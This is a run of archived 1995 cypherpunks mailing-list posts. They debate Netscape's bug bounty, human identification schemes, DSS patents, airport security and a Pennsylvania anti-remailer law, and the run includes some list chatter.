Date: Sat, 14 Oct 95 05:43:35 PDT
To: cypherpunks@toad.com
Subject: Re: mental cryptography
In-Reply-To: <199510132226.PAA13627@jobe.shell.portal.com>
Message-ID: <199510141243.IAA27588@hammond.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


hfinney@shell.portal.com writes:
 > I have read one paper which attempts to solve this problem, called "Human
 > Identification through Insecure Channel".  Unfortunately my papers are in
 > a mess right now so I don't have the reference handy.  It was by some
 > Japnese researchers, published in one of the proceedings books.  I
 > believe a follow-on paper was published within the last year or two which
 > had some improvements or corrections to their algorithm.  Sorry to be so
 > vague, I'll try to dig out more info over the weekend.

The article, by T. Matsumoto and H. Imai, was in Eurocrypt '91, which
is published as vol. 547 of "Lecture notes in computer science".

The only followup article I could find was:
C.-H. Wang, T. Hwang, and J.-J. Tsai, "On the Matsumoto and Imai's
[sic] human identification scheme." (LNCS 921, 1995)

 > >I am sure better algorithms can be found for this purpose if mental 
 > >cryptography is made explicit as a design goal.  Perhaps it should be?
 > 
 > It's a hard problem to solve in general because you have only a human
 > mind to do the identification algorithm but you have computers to try to
 > break it.  But I would like to see the problem get more attention.

It may be that the approach is off anyway. Credit cards have only
signature verification -- if the salesperson bothers -- because stolen
cards are reported. You don't need a strong authentication technique
if a stolen card is easy to cancel.

Of course, perhaps this encourages someone to steal your card and
incapacitate you before you can report it. That's why we have
PINs... so that someone can steal your card, threaten you until you
reveal your PIN, and then incapacitate you... Hmm...

Even with a weak PIN system for authentication, you can always provide
a "duress" PIN, right?

nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Sat, 14 Oct 95 05:59:18 PDT
To: cypherpunks@toad.com
Subject: Re: mental cryptography
In-Reply-To: <199510132226.PAA13627@jobe.shell.portal.com>
Message-ID: <199510141259.IAA27807@hammond.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


Nathan Loofbourrow writes:
 > C.-H. Wang, T. Hwang, and J.-J. Tsai, "On the Matsumoto and Imai's
 > [sic] human identification scheme." (LNCS 921, 1995)

Uh, silly me, that happens to be the EUROCRYPT '95 proceedings.

Boy, and isn't it fun to receive all the bounce messages from every
post to cypherpunks?

nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MIGUELDIAZ@megaweb.com (Miguel Diaz)
Date: Sat, 14 Oct 95 06:04:58 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
Message-ID: <199510141302.JAA04592@mail-e1a.megaweb.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen writes in part:

>	The idea that Netscape (like Microsoft) thinks they can 
get
> free
>testing services from all over the net by real experts just
> by offerring
>a tee shirt is down right offensive.
>

Ditto.  The next major hack of Netscape will likely be used to 
bring that company to its knees. Unless one assumes that 
obvious backdoors will still be unprotected by their new code, 
a lot of computing time for brute force attacks and algorithm 
development will have to be spent to properly crack Netscape 
again. I seriously doubt the successful individuals will 
merely settle for fame and not fortune this time around.

OTOH I would much rather see MS get hacked next. If the 
rumors, which are piling now, on MS being a Peeping Tom when 
it comes to hard drives are true, I wonder if there might be a 
way to send a byte bomb to their bit bucket??.......







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 14 Oct 95 09:21:34 PDT
To: cypherpunks@toad.com
Subject: Re: airport security
Message-ID: <199510141621.JAA19984@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:16 AM 10/14/95 -0400, Bob Bruen wrote:

>  The US is merely trying to catch up to what the Europeans have been doing
>for over a decade. In fact, the US still has a way to go. You ought to pass
>through Heathrow in London some time to see what real airport security looks
>like. The US security changes are a recent response, starting after the
>World Trade Center bombing and being stepped up on a continuing basis.
>Today you need a picture ID to board with your ticket. Tomorrow...? We have
>lived in relative safety compared to the rest of the world, but I think those
>days are over. 

I remember back during one of the previous FAA panics over terrorism.  I was
at the Portland airport discussing the measures with an FAA inspector.  He
explained why they had to have all the searches and stuff to stop anyone
from blowing up the plane.  I pointed out to him that if anyone wanted to do
that, they would just lay off a line of mortars from the hills overlooking
the airport across the river.  He got very quiet and very worried...

You cannot stop someone who is determined to do terrorist acts.  And the
more the government stomps down on descent, the more various groups will get
pissed off and perform terrorist acts, which will cause them to crack down
even harder.  (And on and on and on.)  They forget that the imposition of
order increases the escalation of chaos.

What does this have to do with crypto?  Not a whole lot, other than it will
be one of the first thing to be outlawed in the futile attempt to stomp out
unauthorized communications.  Gotta watch the proles every minute...

"Welcome to the global village!" - Marshall "Number 6" McLuhan
|             Visualize whirled keys              | alano@teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - Black Art | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Philip J. Nesser" <pjnesser@rocket.com>
Date: Sat, 14 Oct 95 10:01:07 PDT
To: fc@all.net
Subject: Re: Netscape rewards are an insult
In-Reply-To: <9510141153.AA16412@all.net>
Message-ID: <199510141700.KAA06274@oac1.rocket.com>
MIME-Version: 1.0
Content-Type: text/plain



Have things really come to this?  Besides the legal implications of
discovering a hole and then selling the information to someone, (who
presumably will only want this information for one purpose) where has the
attitude of doing for the sake of doing gone?  Has Netscape been pestering
security experts on the net for free work?  Have they been plaguing people
or lists with email asking the net to do their jobs?  

I am tired of hearing people who may have had the urge to find weaknesses
and bugs now going greedy and deciding that they should be paid for it.  If
you dont want to participate then don't!  Its that simple.  If you feel
netscape is a greedy money grubbing company who deserves to pay 25k for a
bug report then start a company and develop a competing product which you
feel deserves to get bug reports.  

The reason why the Internet has become so popular/powerful is the
willingness of people to help out and distribute information.  As a
computer/networking professional I have saved hundreds of hours worth of
my time when someone has been able to answer a question or solve a problem
for me.  Likewise I have and continue to give back just as many hours back
answering others questions.  That attitude is completely lacking in your
suggestion and I can only hope that the those opinions are in the minority
even today.

The ironic part is the people who have been the most successful at finding
bugs are not the ones who are demanding money for it!

--->  Phil

>From: fc@all.net (Dr. Frederick B. Cohen)
>Date: Sat, 14 Oct 1995 07:53:53 -0400 (EDT)

>	The idea that Netscape (like Microsoft) thinks they can get free
>testing services from all over the net by real experts just by offerring
>a tee shirt is down right offensive.

>	I have a better idea.  How about an open market in break-in
>software.  We crack Netscape and offer the crack code to the highest
>bidder.  Bids start at US$25K per hole.  For the insult, Netscape has to
>outbid the competition by a factor of 2 to get the details of the hole.
>Here's how it works:

>	- We get a panel of 5 cypherpunk judges who test each claimed hole.
>	- Exploit code is sent to the panel for verification.
>	- If they verify the hole, it is put up for bid.
>	- Winning bidder gets the code for 3 months before it is released
>	  on hacker BBS systems throughout the world.
>	- The panel of judges splits 25% of the money paid for the code
>	  as pay for their efforts.  The rest goes to the author.

>	I have an even better idea.  How about if Netscape gets some
>competent programmers with real security expertise, adds in some good
>change controls, a serious internal testing program, quality control ala
>ISO-9000, internal IT auditors, external IT auditors, training and
>education for their employees, and everything else it takes to be in the
>software business in a serious way.

>	As an alternative, we could help them contact the shareholders
>for a lawsuit.  After all, they are a public company now and are responsible
>to the shareholders for the value of their stock.  If it goes down because
>they aren't doing an adequate job of software quality control, the officers
>may be personally liable.

>-- 
>-> See: Info-Sec Heaven at URL http://all.net
>Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Fri, 13 Oct 95 10:19:01 PDT
To: Adam Shostack <adam@homeport.org>
Subject: Re: IDEA algorithm
Message-ID: <v02120d03aca5a290d1fe@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:50 PM 10/12/95, Adam Shostack wrote:
>| (Btw... what would be the absolute coolest thing folk would like to see
>| added to RSAREF? That is, other than code that we will need to negotiate
>| for. What new thing, speed upgrade, enhancement, etc would just tickle?)
>
>        Consistant pricing.  The knowledge that any app I develop
>using RSAREF can be made into licensed for commercial use product for
>a set, known, published fee.  This would be the biggest win for
>Consensus.

To some degree that is already true. There is no upfront cost for the
licensing, so it is straight royalty based. Right now its 5-4% declining
with gross sales.

>        Another really big win would be to add more entry points to
>the code to legitimize Wei Dai's excellent Crypto++ library, which has
>to jump in at all sorts of unpublished interfaces.

I'll look into this one. We have the ability to add more entry points. Thanks.
That is exactly the kind of thing I was hoping to get.

>Adam

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page  ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Henry Wertz <hwertz@exclusive.com>
Date: Sat, 14 Oct 95 08:47:12 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <9510141153.AA16412@all.net>
Message-ID: <Pine.LNX.3.91.951014104533.30092A-100000@henry.henry.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 14 Oct 1995, Dr. Frederick B. Cohen wrote:

> 	The idea that Netscape (like Microsoft) thinks they can get free
> testing services from all over the net by real experts just by offerring
> a tee shirt is down right offensive.
> 
> 	I have a better idea.  How about an open market in break-in
> software.  We crack Netscape and offer the crack code to the highest
> bidder.  Bids start at US$25K per hole.  For the insult, Netscape has to
> outbid the competition by a factor of 2 to get the details of the hole.
> Here's how it works:
*cut*
     You know, this all seems kind of greedy to me.. It used to be people
would find holes for *fun* and not for profit.  It's still possible to do
that you know 8-).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Sat, 14 Oct 95 08:04:03 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: Netscape rewards are an insult
In-Reply-To: <9510141153.AA16412@all.net>
Message-ID: <Pine.3.89.9510141012.A56556-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 14 Oct 1995, Dr. Frederick B. Cohen wrote:

> 	I have a better idea.  How about an open market in break-in
> software.  We crack Netscape and offer the crack code to the highest
> bidder.  Bids start at US$25K per hole.  For the insult, Netscape has to
> outbid the competition by a factor of 2 to get the details of the hole.
> Here's how it works:
> 
Funny that you mention it, the other mailing list (or rather set of lists)
I'm on is devoted to a just such market system. The Idea Futures home page
is at http://if.arc.ab.ca/~jamesm/IF/IF.shtml. You'll find a few familiar 
faces. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Sat, 14 Oct 95 08:38:11 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: Netscape rewards are an insult
In-Reply-To: <9510141153.AA16412@all.net>
Message-ID: <Pine.3.89.9510141135.A70744-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 14 Oct 1995, Dr. Frederick B. Cohen wrote:

> 	The idea that Netscape (like Microsoft) thinks they can get free
> testing services from all over the net by real experts just by offerring
> a tee shirt is down right offensive.

   
THE NETSCAPE BUGS BOUNTY 

(major snip)   
   
   And if the security bug you find is severe as defined by Netscape, and
   hasn't been previously found, and can be reproduced by us, we'll write
   you a check for $1000. 
   
   "Previously Found" means that either an internal tester or someone
   else who doesn't work for Netscape has already reported a bug that
   causes the same defect.

That's a bit more than just a t-shirt. Since they're being open about 
bug finding, it would be reasonable and helpful for them to publish all
discovered bugs to prevent duplication and give people a forum for 
concentrating efforts. 

As for the t-shirts, it'd real nice at job interviews to show up with 
personalized "(insert your name here) cracked netscape, and all I got was 
this lousy t-shirt" signed with netscape's pgp key (and verifiable at 
their soon to appear (hint, hint) "Bug tester's Hall of Fame"). Looks
nice on CV's too.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sat, 14 Oct 95 11:43:18 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: [URGENT] Where are we meeting today?
Message-ID: <v02120d19aca5c279a930@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



  Place: Sparcy's cafeteria, building 21, Sun Microsystems
               Mountain View, California

  Directions: Take 101 to Amphitheater Parkway.  Turn left
               onto Garcia, and drive about 1/2 mile and turn
               onto the first genuine side street which is
               named Marina Way.   Drive about 1/4 mile and look
               for a right hand turn onto Coast.   Building 21
               will be on your left.  It's on the corner of Coast
               and Marina Way.   There's plenty of parking there.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rschlafly@attmail.com (Roger  Schlafly)
Date: Sat, 14 Oct 95 11:56:14 PDT
To: eli@UX3.SP.CS.CMU.EDU
Subject: DSS patent license
Message-ID: <rschlafly2871855540>
MIME-Version: 1.0
Content-Type: text/plain



>>> RSA Data Security, Inc.
>>> today announced that it is now licensing patents for the Digital Signature
>>> Standard (DSS), the U.S. government standard for digital signatures.
>> 
>> I believe someone was suing the U.S. government on the grounds that the
>> public signature standard wasn't supposed to require proprietary
>> technology.  Has this gone anywhere yet?
>> 
>> --
>>    Eli Brandt
>>    eli+@cs.cmu.edu

Yes, I had such a lawsuit.  No, it didn't go anywhere in the courts,
but the feds did eventually cave in to the principal demand of my
suit: That the DSA patent be made available to anyone on a royalty-free
basis.

So how is it that RSADSI and Cylink/CKC claim you need licenses to
their patents to use DSS?  Because they have other patents.  I have
another lawsuit directed at those patents.  Stay tuned.

Roger Schlafly
rschlafly@attmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Sat, 14 Oct 95 09:02:40 PDT
To: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Subject: The incredible bouncing mailbox (was Re: mental cryptography)
In-Reply-To: <199510141259.IAA27807@hammond.cis.ohio-state.edu>
Message-ID: <Pine.3.89.9510141135.B70663-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 14 Oct 1995, Nathan Loofbourrow wrote:

> Nathan Loofbourrow writes:

> Boy, and isn't it fun to receive all the bounce messages from every
> post to cypherpunks?
Ok, who wants to sic a PI on this Jason P. Jones tentacle or call his local
morgue to see if he's alive enough to delete his mailbox?

A testament to too many high-volume mailing lists.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Sat, 14 Oct 95 09:50:10 PDT
To: Tom Edwards <tedwards@access.digex.net>
Subject: Re: Yes, indeed the PA law is for real!
In-Reply-To: <Pine.SUN.3.91.951013183116.11492A@access5.digex.net>
Message-ID: <9510141649.AA20952@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

    Date: Fri, 13 Oct 1995 18:42:35 -0400 (EDT)
    From: Tom Edwards <tedwards@access.digex.net>

    Well folks, you can go view the new PA law yourselves at URL
    http://moose.erie.net/~italo/rssb655.html

    PA Senate Bill 655 was signed into law on June 13, 1995, and it does
    appear to make non-logged anonymous remailers illegal.

I'm guessing that you're referring to this part of the law:

  (1) [makes or possesses any instrument, apparatus, equipment or]
  makes, distributes, possesses, uses or assembles an unlawful
  telecommunication device or modifies, alters, programs or reprograms
  a telecommunication device designed, adapted or which can be used:

  . . .

  (ii) to conceal or to assist another to conceal from any [supplier
  of telecommunications] telecommunicationservice provider or from any
  lawful authority the existence or place of origin or of destination
  of any telecommunication; or

IANAL, but this sure sounds like one could make the case that an ISP
that allowed users to send mail to arbitrary addresses,
e. g. xxx@anon.penet.fi, would be `guilty' of assisting another to
conceal the place of origin and/or destination of a telecommunication.
I'd imagine that the authorities would be a bit more likely to go
after anonymous-remailer@xxx.net however.

In fact, I wonder if the fact that mail to rfb@cmu.edu is forwarded to
rfb@lehman.com couldn't be construed as `assistance' if I happened to
receive mail at that address through penet.  Sigh . . . .

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMH/p8JNR+/jb2ZlNAQHnTgP/eycb4eJaVDVw9UTmb82ErzR29dnGSrvT
cdaGq8HoUYV1fjwzfD6aW3B8tiPkM9tcpbV5ck3LnNU7Ylgq3S8T8Zg/JNkdf0jE
J8+KO8HhONNjBgA4hRcEkrnZrHwu3S6BknxgQ+ERCASj7XRybk62pkWGciuoUZyp
FfFtv6FAS1E=
=vIYn
-----END PGP SIGNATURE-----
--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key
A `hacker' is one who writes code.  Breaking into systems is `cracking'.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 14 Oct 95 13:11:37 PDT
To: "Roy M. Silvernail" <roy@cybrspc.mn.org>
Subject: [noise] Re: Identity database, another attempt...
In-Reply-To: <951013.170750.4L0.rnr.w165w@cybrspc.mn.org>
Message-ID: <Pine.SOL.3.91.951014125249.28891A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Oct 1995, Roy M. Silvernail wrote:

> Have you flown recently?  They now ask you this scripted question about
> whether you have been approached by anyone you don't know since arriving
> at the airport, and warn you not to accept anything from a stranger or
> leave your carry-on baggage unattended until you board the plane.  The
> ticket agent told me it was a "new FAA regulation".  I hadn't flown
> anywhere for a few years.  Anyone know how long this has been happening?

This probably dates back to the time when a palestinian group tried to 
blow up an El Al flight from London by persauding the pregnant Irish 
girlfriend of one to carry a package for a friend. Flights from London 
have had the spiel ever since. El Al still does the best pre-flight 
screening (much more detailed questioning, and the security staff 
actually listen to the answers.

Simon
----
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1)   ((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Sat, 14 Oct 95 10:10:52 PDT
To: Thomas Grant Edwards <tedwards@glue.umd.edu>
Subject: Re: Netscape 2.0b1J still core dumps on Java
In-Reply-To: <Pine.SUN.3.91.951013184249.18307C-100000@volt.isr.umd.edu>
Message-ID: <9510141709.AA21370@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Fri, 13 Oct 1995 18:54:58 -0400 (EDT)
    From: Thomas Grant Edwards <tedwards@Glue.umd.edu>

    But looking at the ftp sites, I do see the 20b1J for SunOs4.1.3.
    Yey!

Actually it says 4.1.3_U1.  Does anyone know (a) what's the U1 mean
and (b) if, as I assume, it is an upgrade which the local powers that
be have decided against adopting, should I have any expectation of
this binary working under an older, non-upgraded, 4.1.3?

--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key
A `hacker' is one who writes code.  Breaking into systems is `cracking'.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sat, 14 Oct 95 11:04:05 PDT
To: pjnesser@rocket.com (Philip J. Nesser)
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199510141700.KAA06274@oac1.rocket.com>
Message-ID: <9510141801.AA01730@all.net>
MIME-Version: 1.0
Content-Type: text


Phil typed:
> Have things really come to this?  Besides the legal implications of
> discovering a hole and then selling the information to someone, (who
> presumably will only want this information for one purpose) where has the
> attitude of doing for the sake of doing gone?

It's one thing to do good for the sake of doing good.  Most of us do that
every day by participating in this list.  It's quite another thing to be
insulted in the process.  I think that Netscape's reward is an insult,

If they think you can find major security bugs in Netscape for as little
as $1000, they should take the product off the market, or at least stop
claiming that it offers security.

>  Has Netscape been pestering
> security experts on the net for free work?  Have they been plaguing people
> or lists with email asking the net to do their jobs?  

They do far worse.  They claim security when they don't have it, and
when the cypherpunks demonstrate the false claims, Netscape offer
insulting future tribute.  I think that if they are sincere, they should
reward the individuals who found the last few holes with $25,000 each,
and show that they really mean business.

> I am tired of hearing people who may have had the urge to find weaknesses
> and bugs now going greedy and deciding that they should be paid for it.  If
> you dont want to participate then don't!  Its that simple.  If you feel
> netscape is a greedy money grubbing company who deserves to pay 25k for a
> bug report then start a company and develop a competing product which you
> feel deserves to get bug reports.  

I'm not greedy, and I have never found a novel security hole and told
the affected people they had to pay to find out about it.  I just don't
like seeing sincere people who volunteer their efforts being insulted or
trivialized or taken advantage of by the big-money people - and make no
mistake about it - that is what the Netscape offer is really all about.

The $25K is a trivial amount for finding such a hole in a product that
is supposed to secure billions of dollars worth of electronic funds
transfers.  If the bad guys find a hole, it could easily cost millions. 
If you don't believe me, look at the statistics for other holes in the
credit card and telecommunications businesses.  They losses are in the
billions each year. 

	If Netscape won't bet $25K that they have no such holes, why
should their clients bet millions that the bad guys won't find and
exploit one. 

> The reason why the Internet has become so popular/powerful is the
> willingness of people to help out and distribute information.  As a
> computer/networking professional I have saved hundreds of hours worth of
> my time when someone has been able to answer a question or solve a problem
> for me.  Likewise I have and continue to give back just as many hours back
> answering others questions.  That attitude is completely lacking in your
> suggestion and I can only hope that the those opinions are in the minority
> even today.

It's not my attitude that's changing the Internet.  It's the nature of
any technology that it can be used for both good and evil.  The Internet
is no longer a research tool, and there are plenty of people using it
for criminal purposes.  If we don't start seriously rewarding people who
find and help fix the holes, we are dooming the Internet. 

And, oh yeah, the reason the Internet became so popular so fast had
nothing to do with free distribution of information.  It had to do with
the Vice President making public announcements about the NII, enormous
public relations efforts, and lots of national advertising.  The free
information has been there for 25 years or so.  The advertising and the
enormous growth started when the marketing people got going.

> The ironic part is the people who have been the most successful at finding
> bugs are not the ones who are demanding money for it!

The ironic part is that a company that claims to have a "secure" method
for using credit cards on the Internet thinks that their security is so
weak that it only takes $1000 to find a major hole.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 14 Oct 95 11:16:30 PDT
To: cypherpunks@toad.com
Subject: [URGENT] Where are we meeting today?
Message-ID: <199510141814.OAA09802@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Sorry, I spaced the announcement and I can't find it in the archive.
Somewhere at Sun... Would someone please forward me the original post?

TIA,
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMH/+ACoZzwIn1bdtAQGkrgF+JqKcgWrM4VFYaQGbmR6gCg5SBzQe5Php
Qv9OxqnfcFFgbs6ZzzMkf+IietdzliuI
=SZst
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Sat, 14 Oct 95 14:57:33 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <DGF06D.HGJ@sgi.sgi.com>
Message-ID: <199510142157.OAA07731@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DGF06D.HGJ@sgi.sgi.com>, daw@lagos.CS.Berkeley.EDU (David A Wagner) writes:
> In article <199510120147.LAA13833@sweeney.cs.monash.edu.au>,
> Jiri Baum <jirib@sweeney.cs.monash.edu.au> wrote:
>> What you are missing is that you should not say
>> "I want to send my credit card number to Egghead Software"
>> you should say
>> "I want to send my credit card number to 12 34 56 78 9A BC DE F0"

> Why does this sound so much like defining the problem away?

> Maybe I just don't get it...

I agree.  Sending your cc# to a key or an IP address is not what you
want to do.  As a consumer, I want to make sure that I send my cc# to
the merchant I am buying from.

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sat, 14 Oct 95 13:06:41 PDT
To: cypherpunks@toad.com
Subject: Top Math & Physics Sites (fwd)
Message-ID: <199510142006.PAA00384@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
From benjie@relay.net Sat Oct 14 10:48:18 1995
Apparently-To: <vax.micron.com!cbreen@amdahl.com>,
        <vaxc.hofstra.edu!K12BAYKJ@amdahl.com>,
        <vaxc.hofstra.edu!mchong1@amdahl.com>,
        <vern.bga.com!ravage@amdahl.com>, <village.ca!keitbalk@amdahl.com>,
        <weyl.math.virginia.edu!tdv2e@amdahl.com>,
        <wg.icl.co.uk!tom@amdahl.com>, <wg.waii.com!ha9705@amdahl.com>,
        <winnie.fit.edu!gdaubert@amdahl.com>, <wop.wtb.tue.nl!nhz@amdahl.com>,
        <world.std.com!jfran@amdahl.com>,
        <xraysgi.ims.uconn.edu!dmoews@amdahl.com>,
        <yfn.ysu.edu!ah766@amdahl.com>, <zeus.achilles.net!dragon@amdahl.com>,
        <zexecsupp2.eddept.wa.edu.au!e028135@amdahl.com>
Message-Id: <m0t48ny-0005fYa@hip-hop.hh.sbay.org>
Date: Sat, 14 Oct 95 08:47 PDT
Sender: benjie@relay.net (Cyber Robot)
From: "T. Chan" <chan@pointcom.com>
Subject: Top Math & Physics Sites
Designated-To: Internet Amateur Mathematics Society
Replied-From: Internet Amateur Mathematics Society
Precedence: bulk
Sender: iams@hh.sbay.org (Internet Amateur Mathematics Society)
X-Info: email to listserv@hh.sbay.org with "FAQ iams" in the message
X-Ignore: iams  Ignore this line. It's a mailing-list-loop detector.


Dear Friends:

Wed like to invite you to check out our reviews of Math & Physics 
-related sites.  Point reviews and rates thousands of the very best 
sites on the Web, including sites in this area of interest.

Theres no charge and no catch.  We hope our lively, independent reviews 
will prove valuable to members of newsgroups like this one.  We hope 
youll stop by at http://www.pointcom.com.  Thanks for your time.

The sites are rated from 0-50, (50 being best) in Content, Presentation 
and Experience.

The Live Artificial Life Page	38	36	42
Amateur Science	43	35	41
The Geometry Forum	41	36	40
SciEd	45	20	38
The Pavilion of Polyhedreality	25	35	38
Continuous Electron Beam Accelerator Facility	40	42	37
The Geometry Center	36	39	37
Fermi National Accelerator Laboratory	37	40	36
Googolplex	35	23	36
The Largest Known Primes	34	28	36






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sentiono Leowinata <sentiono@cycor.ca>
Date: Sat, 14 Oct 95 12:23:08 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape question transformed
In-Reply-To: <307F54CF.573F@netscape.com>
Message-ID: <Pine.OSF.3.91.951014161328.8295B-100000@bud.peinet.pe.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Oct 1995, Jeff Weinstein wrote:

>   The reason we do it is that without wide exposure outside the
> company, it is virtually impossible to get complete testing coverage.
> Given the incredible variety of machines, OS's, peripherals, etc.
	    ^^^^^^^^^^^^^^^^^^		    ^^^^
> that are available in the real world, there is no way we could
> re-create every possible configuration in the lab.

Yeah right. Way to go, Jeff.
You even say that OS/2 Windows better than Windows itself. Get real.
Don't you even realize that OS/2 is another OS! It has its own API. 
Stop treating other OS-es whose have emulator with the original one. 
Netscape uses some low-level MS-Windows specific API in order to run 
it well. How could you expect it run under emulator?
Now, wait! .. PowerPC will have OS/2 .. therefore, Netscape will say, 
sorry folks - you have to use Netscape for Windows .. bla-bla-bla.
Get real Jeff. Many people try to improve and make a wonderful product 
better, and Netscape certainly one of it. See how many people have 
pledge (even begged - I heard) Netscape to make Netscape for OS/2 (not 
to mention Amiga (oh ya, I forgot, Netscape will tell Amiga users to 
use Mac version because Amiga can run Mac-emulator - ha ha)).

>   We also can't visit every web page, or think of every combination
> of features that clever people in the real world come up with every
> day.  

That's true enough.

Regards,
Sent.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 14 Oct 95 16:25:18 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape question transformed
Message-ID: <199510142325.QAA10194@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:12 PM 10/13/95 -0700, jsw wrote:
>zoetrope@infinet.com wrote:
>>         Why would a compony like Netscape jeapordise themselves by even
>> letting                                               out a beta version so
>> hackers have time to find bugs before the full version is released. Don't
>> take me wrong I have only been on the net fer a little over a year and Love
>> Netscape.  And If I knew what I was Doing I would love to help them.....
>
>  The reason we do it is that without wide exposure outside the
>company, it is virtually impossible to get complete testing coverage.
>Given the incredible variety of machines, OS's, peripherals, etc.
>that are available in the real world, there is no way we could
>re-create every possible configuration in the lab.

I think that the main reason people have problems with the testing offer on
the beta is the lack of responses to bugs in the past.  I have seen many
complaints from people on the net complaining that bugs they had reported in
.90 had continued on into new and continued versions.  That if they recieved
a message back from Netscape it was just an infobot, and a rather hostilly
worded one at that.  (The infobot has been lightened up a great deal.)
Netscape has never had the staff to properly respond to the mail volume they
have recieved.  They have been trying to improve this but it is difficult to
man such a project with people who are able to sort through the piles of
